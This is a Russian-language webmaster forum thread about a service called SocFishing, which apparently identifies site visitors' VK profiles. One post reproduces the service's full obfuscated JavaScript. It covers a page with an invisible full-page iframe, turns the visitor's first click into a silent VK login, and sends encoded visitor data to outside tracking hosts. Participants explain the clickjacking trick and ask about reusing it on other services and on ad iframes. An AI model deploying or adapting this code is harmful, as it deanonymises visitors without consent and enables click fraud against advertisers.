Jump to content
Sign in to follow this  
Zalm

Как работает определение страницы пользователя?!

Recommended Posts

Добрый вечер всем! Хотел бы задать очень интересный вопрос. Есть система SocFishing называется, я ссылку не даю, что бы не подумали что реклама. Так вот, она какими-то образом определяет страницу человека, который пришел ко мне на сайт. Даже если этот человек пришел прямым заходом, или вовсе пришел из поисковой системы. То есть главный вопрос в том, как она устанавливает связь между каким либо пользователем пришедшим на мой сайт и его страницей? как это возможно?

 

e7044f04ec493150e3dfb8b8ce5ff19f.png

Share this post


Link to post
Share on other sites

В интернете нет никаких дискуссий на тему того, как это работает в техническом плане, я ни сайта ни ссылки не дал.

Мне интересно сугубо техническая сторона)

Если бы я рекламировал, то наверняка никто просто так не стал бы раскрывать инфу как это все работает) а я как раз это и ищу)

 

Есть предположения как это может работать?

 

2ce239b08cb0e216b45ff33451e516dd.png

Вот все то единственное что эта система шлет на сервер. Никаких догадок нет  :o  :(

Share this post


Link to post
Share on other sites

А источник (соц. принадлежность) только для контака(vk.com)? Т.е. только из этой системы подбирает профиля?

Данные о переходе смотреть без смысла - из социалки да, будет refer и то не изо всех, да и тут итак все ясно(куку другого домена, как знаете из-за security police получить не выйдет). Другой конечно вопрос - переход директовый или из выдачи п.с. В голову крадутся параноидальные данные о труЪ хацкере или уязвимости API vk но мне кажется все проще - может быть данные "рандомые"? 

Конечно хотелось бы глянуть код, который может определять подобный фактор. Возможно очередная уязвимость, недавно была инфа о том(на хабре) что vk API отдает реальный никнейм пользователя в случае клик-джекинга через javascript (т.е. без авторизации возвращает данные пользователя) - возможно дело зарыто здесь. 

Share this post


Link to post
Share on other sites

А источник (соц. принадлежность) только для контака(vk.com)? Т.е. только из этой системы подбирает профиля?

Данные о переходе смотреть без смысла - из социалки да, будет refer и то не изо всех, да и тут итак все ясно(куку другого домена, как знаете из-за security police получить не выйдет). Другой конечно вопрос - переход директовый или из выдачи п.с. В голову крадутся параноидальные данные о труЪ хацкере или уязвимости API vk но мне кажется все проще - может быть данные "рандомые"? 

Конечно хотелось бы глянуть код, который может определять подобный фактор. Возможно очередная уязвимость, недавно была инфа о том(на хабре) что vk API отдает реальный никнейм пользователя в случае клик-джекинга через javascript (т.е. без авторизации возвращает данные пользователя) - возможно дело зарыто здесь. 

Работает только для VK, но в рекламе у них написано что затем будут подключены и другие соц сети как фейс бук и ОД и все остальное.

Данные НЕ РАНДОМНЫЕ, это реально те кто заходил на сайт, я им писал, и они действительно там были! Как раз из-за этого и появился горячий интерес к техническому моменту как же это может работать, рабочий код можете посмотреть на сайте:

 

kupit - duhi - msk . ru  пробелы только убрать

 

В самом низу страницы стоит этот код

Share this post


Link to post
Share on other sites

Вот они новые технологии! 

В будущем планирую создать свой порно сайт, ух будет весело увидеть там своих друзей, знакомых  :lol:

Share this post


Link to post
Share on other sites

Пришла заманчивая идея, ради интереса и фана сейчас отпишу в support VK) что они скажут интересно)

Share this post


Link to post
Share on other sites

Работает только для VK, но в рекламе у них написано что затем будут подключены и другие соц сети как фейс бук и ОД и все остальное.

Данные НЕ РАНДОМНЫЕ, это реально те кто заходил на сайт, я им писал, и они действительно там были! Как раз из-за этого и появился горячий интерес к техническому моменту как же это может работать, рабочий код можете посмотреть на сайте:

 

kupit - duhi - msk . ru  пробелы только убрать

 

В самом низу страницы стоит этот код

Да, это кликджэкинг (просмотрел стек сетевого обмена - первый клик по сайту инициирует определенный скрипт).

Ща разкалупаю код да узнаем чего он там умного делает  :)  На первый взгляд - именно та уязвимость vk (а мб и фича как ее на хабре прозвали, к сожалению статью найти не могу).

Share this post


Link to post
Share on other sites

Да, это кликджэкинг (просмотрел стек сетевого обмена - первый клик по сайту инициирует определенный скрипт).

Ща разкалупаю код да узнаем чего он там умного делает  :)  На первый взгляд - именно та уязвимость vk (а мб и фича как ее на хабре прозвали, к сожалению статью найти не могу).

 

Да я кстати замечал не приятное ощущение, что при первом заходе страница сама перезагружается! Интересно влияет ли этот как-то на мнение о сайте у Яндекса? Чувствую дело пахнет жареным, день подожду и наверное нужно убрать такой код, а то еще в бан попаду

Share this post


Link to post
Share on other sites

Да я кстати замечал не приятное ощущение, что при первом заходе страница сама перезагружается! Интересно влияет ли этот как-то на мнение о сайте у Яндекса? Чувствую дело пахнет жареным, день подожду и наверное нужно убрать такой код, а то еще в бан попаду

Я бы не советовал далее использовать эту штуку.

Вот вам мое "расследование":

1. Выставлен фрейм во весь сайт с "уехавшим" индексом https://yadi.sk/i/ZLOG_KX1YvRmz

2. По клику - идет типичный запрос авторизации, скрываясь во фрейме. После чего на удаленный хост идет запрос с отправкой данных.

Обработчик:

 function console_out(str) { console.log("SFLog: "+str); }  console_out("loader v0.3");  console_out("1947");  console_out("9213");  console_out("9811");  console_out("7314");  console_out("5745");  console_out("5848");  console_out("7372");  console_out("6521");  console_out("2262");  console_out("9673");  console_out("8312"); 	(function(){ var c = "noindex"; var _0x5e2b=["\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65","\x72\x65\x6D\x6F\x76\x65\x43\x68\x69\x6C\x64","\x70\x61\x72\x65\x6E\x74\x4E\x6F\x64\x65","\x6C\x65\x6E\x67\x74\x68"];setTimeout(function (){var _0x5525x1=document[_0x5e2b[0]](c);while(_0x5525x1[_0x5e2b[3]]){_0x5525x1[0][_0x5e2b[2]][_0x5e2b[1]](_0x5525x1[0]);} ;} ,50); eval(_0x5e2b); }());
	if( navigator.userAgent.match( "Android|BackBerry|phone|iPad|iPod|IEMobile|Nokia|Mobile|MSIE|iPhone|webOS|Windows Phone|Explorer|Trident" )  )  {
	mnoload = false; console_out('7422'); } else { mnoload = true; console_out('9418'); }
	isSafari = !!navigator.userAgent.match(/Version\/[\d\.]+.*Safari/); if (isSafari) { mnoload = false; console_out('5743'); }
	if (!navigator.cookieEnabled) { mnoload = false; }

	function are_cookies_enabled() {
	var cookieEnabled = (navigator.cookieEnabled) ? true : false;
	if (typeof navigator.cookieEnabled == "undefined" && !cookieEnabled) { 
		document.cookie="sfload";
		cookieEnabled = (document.cookie.indexOf("sfload") != -1) ? true : false;
	}
	return (cookieEnabled);
	}

	if (!are_cookies_enabled()) {
		mnoload = false;
	}

	iframe_url = 'data:text/html;charset=utf-8;base64,PCEtLSBzb2NmaXNoaW5nIHJlbG9hZCAtLT48bWV0YSBuYW1lPSJyb2JvdHMiIGNvbnRlbnQ9Im5vZm9sbG93IiAvPjxzY3JpcHQgYXN5bmM+IGlmKCIiIT13aW5kb3cucmVmZXJyZXIpIHsgY29uc29sZS5sb2coIlNGTG9nOiA5MDE0Iik7IHdpbmRvdy5sb2NhdGlvbi5ocmVmPSJodHRwczovL3Vjb3otaG9zdC5ydS9zaXRlaGlqYWNrLz91PTgzMmIyOWNmYWZiYjA0YTQ5ZjZiZGFhZjZjYzUyYjQ2ZjNlYzg0YzhmMDdjNDRiYzgyMmZiMWU1ZWYyZmIwODcmaG9zdD1kYjZmMzhkY2Y3ZjE0ZWE5ZDMyM2Q2ZWMyNTkxNjk0YmZlZjZkZmQ4YWMzMzUwZmEmdWlkPWE2NjVjZjU5M2IwYzM0MzRiYTM1ZjBiNWQ1NDY0NWFhMTIxMGFlMDMyNDI5MjQxYzBjZjI5MjkwYTM2NWQ4MWE3OWY4N2I3MTlmOGZjOTMxNjRlMzFjNWQ4Y2ZhODhkYWViOTEwNDBjYThlMjBmOTU4MTU3M2Q0OTQyYjY1NGJiNDAxYWU3ZDg2MDI1OGQ4MWIyNTZhY2MyZGZlZjE0MjM2ZGQ0ZGJjM2NiYzZiZmZhZTZiM2JhZWM4NjRmODI4YTZiNTgxMjc3YWY1ZTdhYWEwOGFiMTc5NiI7IH0gZWxzZSB7IHdpbmRvdy5sb2NhdGlvbi5ocmVmPSJkYXRhOnRleHQvaHRtbDtjaGFyc2V0PXV0Zi04O2Jhc2U2NCxQQ0V0TFNCVFJpQXRMVDQ4YzJOeWFYQjBQbU52Ym5OdmJHVXViRzluS0NkVFJreHZaem9nTlRJek1TY3BPM2RwYm1SdmR5NXNiMk5oZEdsdmJpNW9jbVZtUFNkb2RIUndjem92TDNOdlkyZGhkR1V1Y25VdmRISmhZMnN2ZG10ZmMyVnVaQzV3YUhBbk96d3ZjMk55YVhCMFBqd2hMUzBnVTBZZ0xTMCsiOyB9IDwvc2NyaXB0PjwhLS0gc29jZmlzaGluZyByZWxvYWQgLS0+';
	if( mnoload ) {
		console_out('1388');
		document.oncontextmenu = new Function("return false;");

		var sf = document.createElement('div');
		sf.innerHTML = '<iframe src="'+iframe_url+'" name="SFrmload" id="SFrmload" frameborder="no" scrolling="no" allowtransparency style="position:fixed; top:0px; left:0px; bottom:0px; right:0px; width:100%; height:100%; border:none; margin:0; padding:0; filter:alpha(opacity=1); opacity:1; cursor: pointer; z-index:88888;" /><\/iframe>'; 
		(document.getElementsByTagName('html')[0] || document.body).appendChild( sf );
		sf = document.getElementById("SFrmload");
		sf.parent = undefined;
 
 		/** 
 		onload = function () {
			console_out('3640');
			var sf = document.createElement('div');
			sf.innerHTML = '<iframe src="'+iframe_url+'" name="SFrmload" id="SFrmload" frameborder="no" scrolling="no" allowtransparency style="position:fixed; top:0px; left:0px; bottom:0px; right:0px; width:100%; height:100%; border:none; margin:0; padding:0; filter:alpha(opacity=0); opacity:0; cursor: pointer; z-index:88888;" /><\/iframe>'; 
			document.body.appendChild( sf );

			sf = document.getElementById("SFrmload");
			sf.parent = undefined;
			console_out('1497');
		} 
		**/
	}

	onmessage = function(evnt) {
		if (evnt.data=='patched') {
			document.getElementById('SFrmload').style.visibility = "hidden";
			document.getElementById("SFrmload").style.height = "1px";
			document.getElementById("SFrmload").style.width = "1px";
			console_out('9949');
		}
	}

 

Поколупав код вы без проблем найдете куда и что он отправляет, пример:

<!-- SF --><script>console.log('SFLog: 5231');window.location.href='https://socgate.ru/track/vk_send.php';</script><!-- SF -->

или

https://ucoz-host.ru/sitehijack/?u=832b29cfafbb04a49f6bdaaf6cc52b46f3ec84c8f07c44bc822fb1e5ef2fb087&host=db6f38dcf7f14ea9d323d6ec2591694bfef6dfd8ac3350fa&uid=a665cf593b0c3434ba35f0b5d54645aa1210ae032429241c0cf29290a365d81a79f87b719f8fc93164e31c5d8cfa88daeb91040ca8e20f9581573d4942b654bb401ae7d860258d81b256acc2dfef14236dd4dbc3cbc6bffae6b3baec864f828a6b581277af5e7aaa08ab1796

В последнем данные похожи на некий XOR-алгоритм двухстороннего шифрования (обратимого шифра), который если уж вам слишком припекает можно и подобрать, у меня не стоит на байтовый анализ алгоритма, честно, давно завязал с этим  :D

Ответ: откуда взялись данные? С уязвимости/фичи ВК. Как благодарить за разъяснение думаю знаете )

Share this post


Link to post
Share on other sites

У вк в апи есть кнопка авторизация на сайте, работает через javascript. Вот берется эта кнопка делается прозрачной и цепляется к мышке. Когда пользователь делает первый клик на сайте сам того не зная кликает по этой кнопке и происходит авторизация через контакт.

В супорте контакта такую возможность багом не считают.

Share this post


Link to post
Share on other sites

Я бы не советовал далее использовать эту штуку.

Почему? Она будет плохо влиять на сайт для яндекса? Судя по тому что я понял из объяснения, это тот же попандер(в глазах яндекса) только более крутой и не заметный? 

 

 

У вк в апи есть кнопка авторизация на сайте, работает через javascript. Вот берется эта кнопка делается прозрачной и цепляется к мышке. Когда пользователь делает первый клик на сайте сам того не зная кликает по этой кнопке и происходит авторизация через контакт.

В супорте контакта такую возможность багом не считают.

Выходит так можно и к другим сервисам сделать? или нет?

Share this post


Link to post
Share on other sites

 

Почему? Она будет плохо влиять на сайт для яндекса? Судя по тому что я понял из объяснения, это тот же попандер(в глазах яндекса) только более крутой и не заметный? 

 

 

Выходит так можно и к другим сервисам сделать? или нет?

 

Явно поисковики будут не восторге от подобных скриптов, по сути кликандер который по тихой что-то там делает.

Не знаю насчет других, все зависит от того есть ли у них подобные виджеты.  

Вот он "Виджет для авторизации" - http://vk.com/dev/Auth Фишка в том что он не спрашивает разрешения у пользователя.

Share this post


Link to post
Share on other sites

Явно поисковики будут не восторге от подобных скриптов, по сути кликандер который по тихой что-то там делает.

Не знаю насчет других, все зависит от того есть ли у них подобные виджеты.  

Вот он "Виджет для авторизации" - http://vk.com/dev/Auth Фишка в том что он не спрашивает разрешения у пользователя.

Да я выше об этом и писал. Была где то статья на хабре недавно об этой уязвимости, где позже саппорт контагта назвал ее "фичей" и умельцы начали активно практиковать кликджэкинг )

Share this post


Link to post
Share on other sites

Да я выше об этом и писал. Была где то статья на хабре недавно об этой уязвимости, где позже саппорт контагта назвал ее "фичей" и умельцы начали активно практиковать кликджэкинг )

Ну, на лендинги можно ставить значит) 

 

Интересно а можно ли такими способами на тизеры кликнуть или на любой другой рекламный iframe?) :rolleyes:

Share this post


Link to post
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

Sign in to follow this  

  • Recently Browsing   0 members

    No registered users viewing this page.

×
×
  • Create New...